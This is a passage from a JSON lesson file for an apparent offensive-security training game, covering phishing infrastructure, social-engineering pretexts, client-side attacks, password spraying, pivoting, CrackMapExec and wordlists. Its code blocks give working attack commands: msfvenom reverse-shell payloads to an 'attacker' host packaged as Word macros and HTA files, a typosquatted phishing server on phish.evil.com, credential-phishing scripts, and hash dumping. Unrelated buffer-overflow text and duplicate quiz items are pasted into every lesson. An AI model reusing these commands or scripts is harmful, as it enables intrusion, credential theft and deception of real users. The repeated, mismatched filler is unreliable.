-u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"ex-phishing-infra","cat":"Exploitation","title":"Phishing Infrastructure Setup","diff":2,"xp":150,"intro":"Build a convincing phishing campaign infrastructure.","sections":[{"type":"text","content":"Domain registration (typosquatting), SSL cert, GoPhish server, email template, and landing page. Make it indistinguishable from the real thing."},{"type":"code","lang":"bash","content":"# Register lookalike domain\n# g00gle.com, target-login.com\n# Get SSL cert (Let's Encrypt)\ncertbot --nginx -d phish.evil.com\n# Deploy GoPhish\n./gophish\n# Create: sending profile, landing page, email template, user group"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Phishing infrastructure needs SSL because...","opts":["It's required by law","Browsers warn on HTTP and users check for the padlock","It prevents detection","It speeds up delivery"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-social-eng","cat":"Exploitation","title":"Social Engineering Fundamentals","diff":1,"xp":75,"intro":"Hack the human \u2014 the weakest link in any security chain.","sections":[{"type":"text","content":"Pretexting, phishing, vishing, tailgating, baiting \u2014 all exploit human psychology: authority, urgency, trust, and helpfulness."},{"type":"code","lang":"bash","content":"# Pretext examples:\n# 'Hi, I'm from IT. We need to verify your credentials for the migration.'\n# 'Your account has been compromised. Click here to secure it immediately.'\n# 'I'm the new intern. Could you hold the door? My badge isn't working yet.'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Social engineering exploits...","opts":["Software vulnerabilities","Human psychology (trust, urgency, authority)","Network protocols","Encryption"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-client-side","cat":"Exploitation","title":"Client-Side Attacks","diff":2,"xp":150,"intro":"Target the user's browser and applications.","sections":[{"type":"text","content":"When the server is hardened, attack the client: malicious documents (macros), browser exploits, malicious links, watering hole attacks."},{"type":"code","lang":"bash","content":"# Malicious macro document\nmsfvenom -p windows/shell_reverse_tcp LHOST=attacker LPORT=4444 -f vba-exe\n# Embed in Word document\n# Or HTML Application (.hta)\nmsfvenom -p windows/shell_reverse_tcp LHOST=attacker LPORT=4444 -f hta-psh -o evil.hta"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Client-side attacks target...","opts":["The server directly","The user's browser and applications","The network","The database"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-password-spray","cat":"Exploitation","title":"Password Spraying","diff":1,"xp":100,"intro":"Try one common password against many accounts.","sections":[{"type":"text","content":"Instead of many passwords against one account (triggers lockout), try one password against all accounts. Then wait and try another."},{"type":"code","lang":"bash","content":"# Spray one password across all domain users\ncrackmapexec smb DC -u users.txt -p 'Spring2024!' --continue-on-success\nspray.sh -smb DC users.txt 'Company123!'\n# Wait for lockout timer, then try next password"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Password spraying avoids lockout by...","opts":["Using encryption","Trying one password across many accounts instead of many against one","Using VPN","Changing IP"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-pivot-techniques","cat":"Exploitation","title":"Pivoting Techniques Overview","diff":2,"xp":150,"intro":"Route attack traffic through compromised hosts.","sections":[{"type":"text","content":"SSH tunneling, chisel, socat, meterpreter routes, ligolo-ng \u2014 different tools for different situations."},{"type":"code","lang":"bash","content":"# SSH dynamic SOCKS\nssh -D 1080 user@pivot\nproxychains nmap 10.0.0.0/24\n# Chisel\nchisel server --reverse --port 8080\nchisel client attacker:8080 R:socks\n# Ligolo-ng (modern, fast)\nligolo-proxy -selfcert\nligolo-agent -connect attacker:11601 -retry"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Pivoting lets you access...","opts":["The internet","Networks only reachable from the compromised host","Cloud services","Email"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-crackmapexec","cat":"Exploitation","title":"CrackMapExec Mastery","diff":2,"xp":150,"intro":"Swiss Army knife for network pentesting.","sections":[{"type":"text","content":"CME does it all: SMB enumeration, authentication testing, command execution, password spraying, hash extraction, and lateral movement \u2014 across entire networks."},{"type":"code","lang":"bash","content":"# Enumerate\ncrackmapexec smb 10.0.0.0/24\n# Password spray\ncrackmapexec smb DC -u users.txt -p pass.txt\n# Execute commands\ncrackmapexec smb target -u admin -p pass -x 'whoami'\n# Dump hashes\ncrackmapexec smb target -u admin -p pass --sam"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"CrackMapExec operates primarily over...","opts":["HTTP","SMB (port 445)","SSH","RDP"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-wordlist-gen","cat":"Exploitation","title":"Advanced Wordlist Generation","diff":2,"xp":150,"intro":"Create targeted wordlists for maximum effectiveness.","sections":[{"type":"text","content":"Combine: CeWL output, username mutations, date patterns, company name variations, and John the Ripper rules."},{"type":"code","lang":"bash","content":"# Company-specific\ncewl https://target.com -d 3 -m 5 -w base.txt\n# Add mutations\necho 'Target2024!' >> base.txt\necho 'target2024' >> base.txt\njohn --wordlist=base.txt --rules=All --stdout > final.txt\n# Common patterns: Season+Year+!, Company+Year"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Custom wordlists are effective because...","opts":["They're longer","They contain words relevant to the specific target","They use encryption","They're machine-generated"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race 